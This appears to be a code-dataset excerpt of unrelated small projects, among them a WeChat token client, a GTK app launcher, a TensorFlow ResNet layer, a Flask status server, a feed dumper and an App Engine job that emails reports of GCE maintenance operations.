<gh_stars>1-10 import asyncio import json import aiohttp class GetAccessTokenError(Exception): def __init__(self, message, original_exception=None, wx_response=''): super().__init__(message) self.original_exception = original_exception self.wx_response = wx_response async def get_access_token(session, config, req_dict): '''Sample implementation of getting access token. This routine expects your service to accept JSON-RPC 2.0 requests and be reachable on the HTTP URL that `config.wechatgo_jsonrpc_addr` specifies. JSON-RPC 2.0 Specification: http://www.jsonrpc.org/specification Request method is 'WeChat.AccessToken' Request params: - app_id: The AppID you will see on mp.weixin.qq.com Response fields: - access_token: The magic string that you need ''' GET_TOKEN_METHOD = 'WeChat.AccessToken' JSONRPC_CNTTYPE = 'application/json' TOKEN_SERVICE_JSONRPC_ADDR = 'http://localhost:8367/' GET_TOKEN_TIMEOUT_SEC = 1 try: TOKEN_SERVICE_JSONRPC_ADDR = config.token_service_jsonrpc_addr except AttributeError: pass # Use default value if not found try: GET_TOKEN_TIMEOUT_SEC = float(config.get_token_timeout_sec) except AttributeError: pass payload = { 'method': GET_TOKEN_METHOD, 'params': {}, 'jsonrpc': '2.0', 'id': 0, } headers = { 'Content-Type': JSONRPC_CNTTYPE, } async with session.post(TOKEN_SERVICE_JSONRPC_ADDR, data=payload, headers=headers, timeout=GET_TOKEN_TIMEOUT_SEC) as res: body = await res.text() try: token_obj = json.loads(body) return token_obj['result']['access_token'] except (json.decoder.JSONDecodeError, KeyError) as e: raise GetAccessTokenError(repr(e), e, body)
import asyncio import json import aiohttp class GetAccessTokenError(Exception): def __init__(self, message, original_exception=None, wx_response=''): super().__init__(message) self.original_exception = original_exception self.wx_response = wx_response async def get_access_token(session, config, req_dict): '''Sample implementation of getting access token. This routine expects your service to accept JSON-RPC 2.0 requests and be reachable on the HTTP URL that `config.wechatgo_jsonrpc_addr` specifies. JSON-RPC 2.0 Specification: http://www.jsonrpc.org/specification Request method is 'WeChat.AccessToken' Request params: - app_id: The AppID you will see on mp.weixin.qq.com Response fields: - access_token: The magic string that you need ''' GET_TOKEN_METHOD = 'WeChat.AccessToken' JSONRPC_CNTTYPE = 'application/json' TOKEN_SERVICE_JSONRPC_ADDR = 'http://localhost:8367/' GET_TOKEN_TIMEOUT_SEC = 1 try: TOKEN_SERVICE_JSONRPC_ADDR = config.token_service_jsonrpc_addr except AttributeError: pass # Use default value if not found try: GET_TOKEN_TIMEOUT_SEC = float(config.get_token_timeout_sec) except AttributeError: pass payload = { 'method': GET_TOKEN_METHOD, 'params': {}, 'jsonrpc': '2.0', 'id': 0, } headers = { 'Content-Type': JSONRPC_CNTTYPE, } async with session.post(TOKEN_SERVICE_JSONRPC_ADDR, data=payload, headers=headers, timeout=GET_TOKEN_TIMEOUT_SEC) as res: body = await res.text() try: token_obj = json.loads(body) return token_obj['result']['access_token'] except (json.decoder.JSONDecodeError, KeyError) as e: raise GetAccessTokenError(repr(e), e, body)
en
0.629978
Sample implementation of getting access token. This routine expects your service to accept JSON-RPC 2.0 requests and be reachable on the HTTP URL that `config.wechatgo_jsonrpc_addr` specifies. JSON-RPC 2.0 Specification: http://www.jsonrpc.org/specification Request method is 'WeChat.AccessToken' Request params: - app_id: The AppID you will see on mp.weixin.qq.com Response fields: - access_token: The magic string that you need # Use default value if not found
2.629972
3
scripts/termExtractor.py
tacitia/ThoughtFlow
0
6627913
import json
import sys

from topia.termextract import tag
from topia.termextract import extract
import nltk


def uniqify(seq, idFun=None):
    """Return *seq* with duplicates removed, preserving first-seen order.

    ``idFun`` maps an item to the key used for duplicate detection
    (identity by default).
    """
    # order preserving
    if idFun is None:
        def idFun(x):
            return x
    seen = {}
    result = []
    for item in seq:
        marker = idFun(item)
        if marker in seen:
            continue
        seen[marker] = 1
        result.append(item)
    return result


def build(language='english'):
    """Tag 'testDocument.txt' and return the extracted terms (weak ones too)."""
    # initialize the tagger with the required language
    tagger = tag.Tagger(language)
    tagger.initialize()
    # create the extractor with the tagger
    extractor = extract.TermExtractor(tagger=tagger)
    # invoke tagging the text
    s = nltk.data.load('testDocument.txt', format='raw')
    extractor.tagger(s)
    # extract all the terms, even the "weak" ones
    extractor.filter = extract.DefaultFilter(singleStrengthMinOccur=2)
    # extract
    return extractor(s)


resultList = []
# get a results
result = build('english')
# BUG FIX: `print result` is Python-2-only statement syntax and a
# SyntaxError under Python 3; the parenthesized call works on both.
print(result)
# for r in result:  # discard the weights for now, not using them at this
#                   # point and defaulting to lowercase keywords/tags
#     resultList.append(r[0].lower())
# print(resultList)
import json import sys from topia.termextract import tag from topia.termextract import extract import nltk def uniqify(seq, idFun=None): # order preserving if idFun is None: def idFun(x): return x seen = {} result = [] for item in seq: marker = idFun(item) if marker in seen: continue seen[marker] = 1 result.append(item) return result def build(language='english'): # initialize the tagger with the required language tagger = tag.Tagger(language) tagger.initialize() # create the extractor with the tagger extractor = extract.TermExtractor(tagger=tagger) # invoke tagging the text s = nltk.data.load('testDocument.txt',format = 'raw') extractor.tagger(s) # extract all the terms, even the "weak" ones extractor.filter = extract.DefaultFilter(singleStrengthMinOccur=2) # extract return extractor(s) resultList = [] # get a results result = build('english') print result # for r in result: # discard the weights for now, not using them at this point and defaulting to lowercase keywords/tags # resultList.append(r[0].lower()) #print resultList
en
0.700193
# order preserving # initialize the tagger with the required language # create the extractor with the tagger # invoke tagging the text # extract all the terms, even the "weak" ones # extract # get a results # for r in result: # discard the weights for now, not using them at this point and defaulting to lowercase keywords/tags # resultList.append(r[0].lower()) #print resultList
2.903149
3
fleamarket/urls.py
geraldofada/flea-market
0
6627914
<filename>fleamarket/urls.py
# Root URL configuration for the fleamarket Django project.
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path
from django.urls.conf import include

from fleamarket import views, settings

urlpatterns = [
    # Landing page.
    path('', views.index, name='index'),
    # User routes are also mounted at the site root.
    path('', include('users.urls')),
    path('product/', include('product.urls')),
    path('category/', include('category.urls')),
    path('cart/', include('cart.urls')),
    path('payment/', include('payment.urls')),
    path('admin/', admin.site.urls),
]

# Serve user-uploaded media through Django only in development;
# in production a web server should handle MEDIA_URL instead.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
<filename>fleamarket/urls.py from django.conf.urls.static import static from django.contrib import admin from django.urls import path from django.urls.conf import include from fleamarket import views, settings urlpatterns = [ path('', views.index, name='index'), path('', include('users.urls')), path('product/', include('product.urls')), path('category/', include('category.urls')), path('cart/', include('cart.urls')), path('payment/', include('payment.urls')), path('admin/', admin.site.urls), ] if settings.DEBUG: urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
none
1
1.881007
2
TouchLauncher/script.py
cafehaine/tiling4tablets
1
6627915
<reponame>cafehaine/tiling4tablets
# Gui stuff
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk

# XDG stuff to fetch the application list
from os.path import join
from glob import glob
from xdg import Menu, DesktopEntry
from subprocess import call

# String manipulation thingies
import unicodedata
import re


def remove_accents(input_str):
    """
    Strip diacritics: NFKD-decompose the string and drop combining marks.

    function by MiniQuark over at stackoverflow
    https://stackoverflow.com/a/517974/2279323
    """
    nfkd_form = unicodedata.normalize('NFKD', input_str)
    return u"".join([c for c in nfkd_form if not unicodedata.combining(c)])


def run_entry(entry):
    # Launch the .desktop entry via exo-open.
    call(['exo-open', entry.path])


def fetch_application_list():
    """Collect visible, de-duplicated .desktop entries from every XDG
    application directory, sorted accent- and case-insensitively by name."""
    application_directories = [join(p, 'applications') for p in Menu.xdg_data_dirs]
    entries = []
    names = []  # display names already seen, used for de-duplication
    for directory in application_directories:
        for f in glob(join(directory, "**/*.desktop"), recursive=True):
            entry = DesktopEntry.DesktopEntry(f)
            # Skip NoDisplay entries and duplicates (same display name).
            if not entry.getNoDisplay() and entry.getName() not in names:
                names.append(entry.getName())
                entry.path = f  # remember the source file for launching later
                entries.append(entry)
    return sorted(entries, key=lambda e: remove_accents(e.getName().lower()))


class FlowBoxWindow(Gtk.Window):
    """Fullscreen launcher window: a vertically scrollable flow of app buttons."""

    def __init__(self):
        Gtk.Window.__init__(self, title="TouchLauncher")
        self.set_border_width(0)
        scrolled = Gtk.ScrolledWindow()
        # Scroll vertically only, never horizontally.
        scrolled.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
        flowbox = Gtk.FlowBox()
        flowbox.set_valign(Gtk.Align.START)
        flowbox.set_max_children_per_line(6)
        flowbox.set_selection_mode(Gtk.SelectionMode.NONE)
        flowbox.set_column_spacing(10)
        flowbox.set_row_spacing(10)
        flowbox.set_border_width(20)
        self.fill_flowbox(flowbox)
        scrolled.add(flowbox)
        self.add(scrolled)
        self.show_all()
        self.fullscreen()

    def fill_flowbox(self, flowbox):
        """Populate the flowbox: a Close button first, then one button per app."""
        # close button
        icon = Gtk.Image.new_from_icon_name("window-close", 6)
        icon.set_pixel_size(128)
        button = Gtk.Button(label="Close", image=icon, image_position=Gtk.PositionType.TOP, always_show_image=True)
        button.connect("clicked", Gtk.main_quit)
        flowbox.add(button)
        for app in fetch_application_list():
            icon = Gtk.Image.new_from_icon_name(app.getIcon(), 6)
            icon.set_pixel_size(128)
            button = Gtk.Button(label=app.getName(), image=icon, image_position=Gtk.PositionType.TOP, always_show_image=True)
            # Stash the entry on the button so the click handler can launch it.
            button.app = app
            button.connect("clicked", lambda e: (run_entry(e.app), Gtk.main_quit()))
            flowbox.add(button)


win = FlowBoxWindow()
win.connect("destroy", Gtk.main_quit)
Gtk.main()
# Gui stuff import gi gi.require_version('Gtk', '3.0') from gi.repository import Gtk, Gdk # XDG stuff to fetch the application list from os.path import join from glob import glob from xdg import Menu, DesktopEntry from subprocess import call # String manipulation thingies import unicodedata import re def remove_accents(input_str): """ function by MiniQuark over at stackoverflow https://stackoverflow.com/a/517974/2279323 """ nfkd_form = unicodedata.normalize('NFKD', input_str) return u"".join([c for c in nfkd_form if not unicodedata.combining(c)]) def run_entry(entry): call(['exo-open',entry.path]) def fetch_application_list(): application_directories = [join(p,'applications') for p in Menu.xdg_data_dirs] entries = [] names = [] for directory in application_directories: for f in glob(join(directory,"**/*.desktop"), recursive=True): entry = DesktopEntry.DesktopEntry(f) if not entry.getNoDisplay() and entry.getName() not in names: names.append(entry.getName()) entry.path = f entries.append(entry) return sorted(entries, key=lambda e: remove_accents(e.getName().lower())) class FlowBoxWindow(Gtk.Window): def __init__(self): Gtk.Window.__init__(self, title="TouchLauncher") self.set_border_width(0) scrolled = Gtk.ScrolledWindow() scrolled.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC) flowbox = Gtk.FlowBox() flowbox.set_valign(Gtk.Align.START) flowbox.set_max_children_per_line(6) flowbox.set_selection_mode(Gtk.SelectionMode.NONE) flowbox.set_column_spacing(10) flowbox.set_row_spacing(10) flowbox.set_border_width(20) self.fill_flowbox(flowbox) scrolled.add(flowbox) self.add(scrolled) self.show_all() self.fullscreen() def fill_flowbox(self, flowbox): # close button icon = Gtk.Image.new_from_icon_name("window-close",6) icon.set_pixel_size(128) button = Gtk.Button(label="Close", image=icon, image_position=Gtk.PositionType.TOP, always_show_image=True) button.connect("clicked", Gtk.main_quit) flowbox.add(button) for app in fetch_application_list(): icon = 
Gtk.Image.new_from_icon_name(app.getIcon(),6) icon.set_pixel_size(128) button = Gtk.Button(label=app.getName(), image=icon, image_position=Gtk.PositionType.TOP, always_show_image=True) button.app = app button.connect("clicked", lambda e:(run_entry(e.app), Gtk.main_quit())) flowbox.add(button) win = FlowBoxWindow() win.connect("destroy", Gtk.main_quit) Gtk.main()
en
0.63586
# Gui stuff # XDG stuff to fetch the application list # String manipulation thingies function by MiniQuark over at stackoverflow https://stackoverflow.com/a/517974/2279323 # close button
2.537773
3
networks/layers/dense_resnet_value.py
google-research/ibc
180
6627916
<gh_stars>100-1000
# coding=utf-8
# Copyright 2022 The Reach ML Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dense Resnet Value Network."""

import gin
import tensorflow.compat.v2 as tf


@gin.configurable
class DenseResnetValue(tf.keras.layers.Layer):
  """Dense Resnet layer.

  Input projection to `width`, `num_blocks` residual dense blocks, then a
  final projection to a single scalar output.
  """

  def __init__(self, width=512, num_blocks=2):
    super(DenseResnetValue, self).__init__()
    self.dense0 = dense(width)
    self.blocks = [ResNetDenseBlock(width) for _ in range(num_blocks)]
    # Final head maps to a single value.
    self.dense1 = dense(1)

  def call(self, x, training):
    x = self.dense0(x, training=training)
    for block in self.blocks:
      x = block(x, training=training)
    x = self.dense1(x, training=training)
    return x


def dense(width):
  """Linear layer, no activation."""
  return tf.keras.layers.Dense(
      width,
      activation=None,
      kernel_initializer='normal',
      bias_initializer='normal')


class ResNetDenseBlock(tf.keras.layers.Layer):
  """Dense resnet block.

  Bottleneck shape: width//4 -> width//4 -> width, with activations applied
  before each dense layer (pre-activation ordering).
  """

  def __init__(self, width):
    super(ResNetDenseBlock, self).__init__()
    self.dense0 = dense(width // 4)
    self.dense1 = dense(width // 4)
    self.dense2 = dense(width)
    # Projection for the skip connection when input width differs.
    self.dense3 = dense(width)
    self.activation0 = tf.keras.layers.ReLU()
    self.activation1 = tf.keras.layers.ReLU()
    self.activation2 = tf.keras.layers.ReLU()
    self.activation3 = tf.keras.layers.ReLU()

  def call(self, x, training):
    y = self.dense0(self.activation0(x))
    y = self.dense1(self.activation1(y))
    y = self.dense2(self.activation2(y))
    # Project the residual path only when shapes differ, so x + y is valid.
    if x.shape != y.shape:
      x = self.dense3(self.activation3(x))
    return x + y
# coding=utf-8 # Copyright 2022 The Reach ML Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Dense Resnet Value Network.""" import gin import tensorflow.compat.v2 as tf @gin.configurable class DenseResnetValue(tf.keras.layers.Layer): """Dense Resnet layer.""" def __init__(self, width=512, num_blocks=2): super(DenseResnetValue, self).__init__() self.dense0 = dense(width) self.blocks = [ResNetDenseBlock(width) for _ in range(num_blocks)] self.dense1 = dense(1) def call(self, x, training): x = self.dense0(x, training=training) for block in self.blocks: x = block(x, training=training) x = self.dense1(x, training=training) return x def dense(width): """Linear layer, no activation.""" return tf.keras.layers.Dense( width, activation=None, kernel_initializer='normal', bias_initializer='normal') class ResNetDenseBlock(tf.keras.layers.Layer): """Dense resnet block.""" def __init__(self, width): super(ResNetDenseBlock, self).__init__() self.dense0 = dense(width // 4) self.dense1 = dense(width // 4) self.dense2 = dense(width) self.dense3 = dense(width) self.activation0 = tf.keras.layers.ReLU() self.activation1 = tf.keras.layers.ReLU() self.activation2 = tf.keras.layers.ReLU() self.activation3 = tf.keras.layers.ReLU() def call(self, x, training): y = self.dense0(self.activation0(x)) y = self.dense1(self.activation1(y)) y = self.dense2(self.activation2(y)) if x.shape != y.shape: x = self.dense3(self.activation3(x)) return x + y
en
0.827924
# coding=utf-8 # Copyright 2022 The Reach ML Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Dense Resnet Value Network. Dense Resnet layer. Linear layer, no activation. Dense resnet block.
2.451541
2
menu.py
ludoloops/miningpool
1
6627917
# -*- coding: utf-8 -*-
"""Tiny interactive client for the miningpoolhub.com JSON API."""
from urllib.request import Request, urlopen
import json

# Pools available on miningpoolhub.com; the index selects the subdomain.
Coin = ("adzcoin", "auroracoin-qubit", "bitcoin", "bitcoin-cash",
        "bitcoin-gold", "dash", "digibyte-groestl", "digibyte-qubit",
        "digibyte-skein", "electroneum", "ethereum", "ethereum-classic",
        "expanse", "feathercoin", "gamecredits", "geocoin", "globalboosty",
        "groestlcoin", "litecoin", "maxcoin", "monacoin", "monero",
        "musicoin", "myriadcoin-groestl", "myriadcoin-skein",
        "myriadcoin-yescrypt", "sexcoin", "siacoin", "startcoin",
        "verge-scrypt", "vertcoin", "zcash", "zclassic", "zcoin", "zencash")

ApiData = ""  # Put your miningpoolhub API key here.
Api = "&api_key=" + ApiData

# API actions exposed by the pool; the index selects the action.
Action = ("getminingandprofitsstatistics",
          "getautoswitchingandprofitsstatistics", "getuserallbalances",
          "getblockcount", "getblocksfound", "getblockstats",
          "getcurrentworkers", "getdashboarddata", "getdifficulty",
          "getestimatedtime", "gethourlyhashrates", "getnavbardata",
          "getpoolhashrate", "getpoolinfo", "getpoolsharerate",
          "getpoolstatus", "gettimesincelastblock", "gettopcontributors",
          "getuserbalance", "getuserhashrate", "getusersharerate",
          "getuserstatus", "getusertransactions", "getuserworkers", "public")

c = 33  # default coin index (zcoin); remove to enable coin menu selection
a = 18  # default action index (getuserbalance); remove to enable action menu selection


def menu_coin():
    """Prompt for a coin index unless the global ``c`` is already defined."""
    global c
    try:
        c
    except NameError:
        for index, group in enumerate(Coin):
            print("%s: %s" % (index, group))
        c = int(input("coin to choose: "))
        print("selected: ", Coin[c])
    else:
        print("default coin: ", Coin[c])


def menu_action():
    """Prompt for an action index unless the global ``a`` is already defined."""
    global a
    try:
        a
    except NameError:
        for index, group in enumerate(Action):
            print("%s: %s" % (index, group))
        a = int(input("action: "))
        print("selected:", Action[a])
    else:
        print("default Action: ", Action[a])


def fonction(c):
    """Fetch and print the JSON API response for coin ``c`` / global action ``a``."""
    Url = ("https://" + Coin[c] + ".miningpoolhub.com/index.php?page=api&action="
           + Action[a] + Api)
    print("url:", Url)
    # Some pools reject urllib's default user agent, so spoof a browser.
    Req = Request(Url, headers={'User-Agent': 'Mozilla/5.0'})
    Webpage = urlopen(Req).read()
    jsonToPython = json.loads(Webpage)
    print(jsonToPython)


# IMPROVEMENT: guard the interactive/network part so importing this module
# no longer triggers an HTTP request or blocks on input().
if __name__ == "__main__":
    menu_coin()
    menu_action()
    print()
    fonction(c)
# -*- coding: utf-8 -* from urllib.request import Request, urlopen import json Coin=("adzcoin", "auroracoin-qubit", "bitcoin", "bitcoin-cash", "bitcoin-gold", "dash", "digibyte-groestl", "digibyte-qubit", "digibyte-skein", "electroneum", "ethereum", "ethereum-classic", "expanse", "feathercoin", "gamecredits", "geocoin", "globalboosty", "groestlcoin", "litecoin","maxcoin", "monacoin","monero","musicoin", "myriadcoin-groestl","myriadcoin-skein", "myriadcoin-yescrypt", "sexcoin", "siacoin", "startcoin", "verge-scrypt", "vertcoin", "zcash", "zclassic", "zcoin", "zencash") ApiData= "" Api= "&api_key="+ApiData Action=("getminingandprofitsstatistics", "getautoswitchingandprofitsstatistics", "getuserallbalances", "getblockcount","getblocksfound", "getblockstats", "getcurrentworkers","getdashboarddata","getdifficulty", "getestimatedtime", "gethourlyhashrates","getnavbardata", "getpoolhashrate", "getpoolinfo", "getpoolsharerate", "getpoolstatus", "gettimesincelastblock" ,"gettopcontributors", "getuserbalance", "getuserhashrate", "getusersharerate", "getuserstatus", "getusertransactions", "getuserworkers", "public") def menu_coin(): global c try: c except NameError: for index, group in enumerate(Coin): print("%s: %s" % (index, group)) c = int(input("coin to choose: ")) print("selected: ", Coin[c]) else: print("default coin: ", Coin[c]) def menu_action(): global a try: a except NameError: for index, group in enumerate(Action): print("%s: %s" % (index, group)) a = int(input("action: ")) print("selected:",Action[a]) else: print("default Action: ", Action[a]) def fonction(c): Url="https://"+Coin[c]+".miningpoolhub.com/index.php?page=api&action="+Action[a]+Api print("url:", Url) Req = Request(Url, headers={'User-Agent': 'Mozilla/5.0'}) Webpage = urlopen(Req).read() jsonToPython = json.loads(Webpage) print(jsonToPython) c=33 #comment to enable coin menu selection a=18 #comment to enable action menu selection menu_coin() menu_action() print() fonction(c)
en
0.591166
# -*- coding: utf-8 -* #comment to enable coin menu selection #comment to enable action menu selection
2.275413
2
runner/srv.py
StarNumber12046/activities
3
6627918
from flask import Flask, request
import json
import traceback

test = Flask("test")


@test.route("/add", methods=['GET', 'POST'])
def bruh():
    """Store the POSTed (single-quoted pseudo-JSON) session state in session.json."""
    if request.method == "POST":
        print(request)
        print(dir(request.data))
        print(request.data.decode())
        # The client sends Python-repr-style JSON with single quotes;
        # normalize them so json.loads accepts it.
        correct = request.data.decode().replace("'", '"')
        print(correct)
        try:
            print(json.loads(correct))
            # BUG FIX: use a context manager so the file handle is closed
            # even when json.dump raises mid-write.
            with open("session.json", "w") as f:
                session = json.dump(json.loads(correct), fp=f)
            print(session)
        except Exception:
            # BUG FIX: the bare `except:` also swallowed SystemExit and
            # KeyboardInterrupt; Exception is the right boundary here.
            traceback.print_exc()
            print(type(request.data.decode()))
    return {"status": "OK"}


@test.route("/get_status")
def return_status():
    """Return the stored session state as JSON."""
    # BUG FIX: the original did `return json.load(f)` followed by an
    # unreachable `f.close()`, leaking a file handle on every request.
    with open("session.json", "r") as f:
        return json.load(f)


@test.route("/render_banner")
def render_banner():
    # Placeholder endpoint, not implemented yet.
    return {"status": "error", "description": "this function is not ready!"}


@test.route("/return_important")
def get_most_important():
    """Return the highest-priority app currently marked active, if any."""
    with open("session.json", "r") as f:
        files = json.load(f)
    important = ["code", "discord", "paint"]  # change with your priority list of apps in main.py
    for name in important:
        try:
            if files[name]:
                return name
        except Exception:
            pass


# IMPROVEMENT: only start the dev server when executed directly, so the
# module can be imported without binding a socket.
if __name__ == "__main__":
    test.run(host="0.0.0.0", port=5555)
from flask import Flask, request import json, traceback test = Flask("test") @test.route("/add", methods=['GET', 'POST']) def bruh(): if request.method == "POST": print(request) print(dir(request.data)) print(request.data.decode()) correct = request.data.decode().replace("'", '"') print(correct) try: print(json.loads(correct)) f = open("session.json", "w") session = json.dump(json.loads(correct), fp=f) f.close() print(session) except: traceback.print_exc() print(type(request.data.decode())) #print(json.loads(request.data.decode())) return {"status": "OK"} @test.route("/get_status") def return_status(): f = open("session.json", "r") return json.load(f) f.close() @test.route("/render_banner") def render_banner(): return {"status": "error", "description":"this function is not ready!"} @test.route("/return_important") def get_most_important(): f = open("session.json", "r") files = json.load(f) f.close() important = ["code", "discord", "paint"] #change with your priority list of apps in main.py for a in important: try: if files[a]: return a except: pass test.run(host="0.0.0.0", port=5555)
en
0.506601
#print(json.loads(request.data.decode())) #change with your priority list of apps in main.py
2.544496
3
glassball/cmd_rawfeed.py
bwanders/glassball-rss
0
6627919
<filename>glassball/cmd_rawfeed.py import pprint import textwrap import feedparser from .common import Configuration, CommandError, log_error, log_message def register_command(commands, common_args): args = commands.add_parser('raw-feed', help='Retrieves and dumps a raw feed', parents=[common_args]) args.add_argument('url', help='The feed URL') args.add_argument('-a', '--all', action='store_true', help='Output all entry information as well as the feed information') args.set_defaults(command_func=command_rawfeed) def command_rawfeed(options): # Helper to do an indented pretty print def indent_pprint(thing, prefix=' '): print(textwrap.indent(pprint.pformat(thing), prefix)) # This is completely opinionated: anything not starting with `http` is not # retrievable... if not options.url.startswith('http'): # If we are given a config, we can try to look up a non-URL parameter # against the feeds in the config if Configuration.exists(options.config): config = Configuration(options.config) feed = config.get_feed(options.url) if feed: options.url = feed.url else: raise CommandError("Cannot translate name '{}' to a feed URL with '{}'".format(options.url, options.config)) else: raise CommandError("Given url '{}' does not seem to be a retrievable URL".format(options.url)) # Proceed to retrieve the feed feed = feedparser.parse(options.url) display_keys = set(feed.keys()) - {'entries'} first = True for key in sorted(display_keys): if not first: print() first = False print("{}:".format(key)) indent_pprint(feed[key]) if options.all: for entry in feed.entries: print() print("Article:") indent_pprint(entry)
<filename>glassball/cmd_rawfeed.py import pprint import textwrap import feedparser from .common import Configuration, CommandError, log_error, log_message def register_command(commands, common_args): args = commands.add_parser('raw-feed', help='Retrieves and dumps a raw feed', parents=[common_args]) args.add_argument('url', help='The feed URL') args.add_argument('-a', '--all', action='store_true', help='Output all entry information as well as the feed information') args.set_defaults(command_func=command_rawfeed) def command_rawfeed(options): # Helper to do an indented pretty print def indent_pprint(thing, prefix=' '): print(textwrap.indent(pprint.pformat(thing), prefix)) # This is completely opinionated: anything not starting with `http` is not # retrievable... if not options.url.startswith('http'): # If we are given a config, we can try to look up a non-URL parameter # against the feeds in the config if Configuration.exists(options.config): config = Configuration(options.config) feed = config.get_feed(options.url) if feed: options.url = feed.url else: raise CommandError("Cannot translate name '{}' to a feed URL with '{}'".format(options.url, options.config)) else: raise CommandError("Given url '{}' does not seem to be a retrievable URL".format(options.url)) # Proceed to retrieve the feed feed = feedparser.parse(options.url) display_keys = set(feed.keys()) - {'entries'} first = True for key in sorted(display_keys): if not first: print() first = False print("{}:".format(key)) indent_pprint(feed[key]) if options.all: for entry in feed.entries: print() print("Article:") indent_pprint(entry)
en
0.873948
# Helper to do an indented pretty print # This is completely opinionated: anything not starting with `http` is not # retrievable... # If we are given a config, we can try to look up a non-URL parameter # against the feeds in the config # Proceed to retrieve the feed
2.86599
3
main.py
edwardchuang/appengine-operation-monitor
0
6627920
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import webapp2
import httplib2
import os
from pprint import pprint
from datetime import datetime
from datetime import timedelta
from googleapiclient import discovery
from google.appengine.api import mail
from google.appengine.api import app_identity
from google.appengine.api import memcache


class CronJob(webapp2.RequestHandler):
    """Cron endpoint: scans GCE operations and emails a report of new ones."""

    def sendNotification(self, instances, project):
        """Email an HTML table describing the given instance operations."""
        body = """<html><head><body><table><tr><th>instance</th><th>zone</th><th>operation</th><th>time (UTC)</th><th>duration</th></tr>%%ROWS%%</table>
        <br><br>check more information on <a href="https://console.cloud.google.com/compute/operations?project=%%PROJECT%%">https://console.cloud.google.com/compute/operations?project=%%PROJECT%%</a>
        """
        rows = ""
        for instance in instances:
            tmp = ("<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" % (
                instance['instance'], instance['zone'],
                instance['operationType'], instance['startTime'],
                instance['duration']))
            rows += tmp
        body = body.replace('%%ROWS%%', rows).replace("%%PROJECT%%", project)
        # NOTE(review): the sender address was redacted/garbled in this
        # source; restore a valid App Engine mail sender before deploying.
        message = mail.EmailMessage(
            sender='<EMAIL>',
            subject="Instance Operations Detected")
        message.to = os.environ.get('NOTIFICATION_RECEIVER')
        message.html = body
        message.send()

    def getOperationList(self, project):
        """Collect unseen migrate/hostError operations; notify and return count."""
        ret = []
        # Operation types we care about (renamed from `filter`, which
        # shadowed the builtin).
        watched = ['compute.instances.migrateOnHostMaintenance',
                   'compute.instances.hostError']
        http = httplib2.Http()
        service = discovery.build("compute", "v1")
        request = service.globalOperations().aggregatedList(project=project, orderBy='creationTimestamp desc')
        while request is not None:
            response = request.execute()
            if 'items' not in response.keys():
                break
            for zone in response['items']:
                # no operations in this zone
                if 'operations' not in response['items'][zone].keys():
                    continue
                for operation in response['items'][zone]['operations']:
                    if operation['operationType'] not in watched:
                        continue
                    if memcache.get('__OperationId{}'.format(operation['id'])):
                        # found in memcache, duplicated
                        continue
                    instance = operation['targetLink'].split('/')[-1]
                    operationType = operation['operationType']
                    # Timestamps carry a UTC offset and sub-seconds; strip
                    # both ([:-6] drops the offset, [:19] the fraction).
                    endTime = datetime.strptime(operation['endTime'][:-6][:19], '%Y-%m-%dT%H:%M:%S')
                    startTime = datetime.strptime(operation['startTime'][:-6][:19], '%Y-%m-%dT%H:%M:%S')
                    duration = endTime - startTime
                    ret.append({
                        'instance': instance,
                        'operationType': operationType.split('.')[-1],
                        'startTime': str(startTime),
                        'endTime': str(endTime),
                        'zone': zone.split('/')[-1],
                        'duration': str(duration)
                    })
                    memcache.set('__OperationId{}'.format(operation['id']), 1)
            request = service.globalOperations().list_next(previous_request=request, previous_response=response)
        # BUG FIX: `len(ret) is not 0` compared int identity, which only
        # "works" because of CPython's small-int caching; use truthiness.
        if ret:
            self.sendNotification(ret, project)
        return len(ret)

    def get(self):
        events = self.getOperationList(os.environ.get('PROJECT_ID') or app_identity.get_application_id())
        self.response.headers['Content-Type'] = 'text/plain'
        self.response.write('OK, {} events detected'.format(events))


class MainPage(webapp2.RequestHandler):
    def get(self):
        self.response.headers['Content-Type'] = 'text/plain'
        self.response.write('OK')


app = webapp2.WSGIApplication([
    ('/cron', CronJob),
    ('/.*', MainPage),
], debug=False)
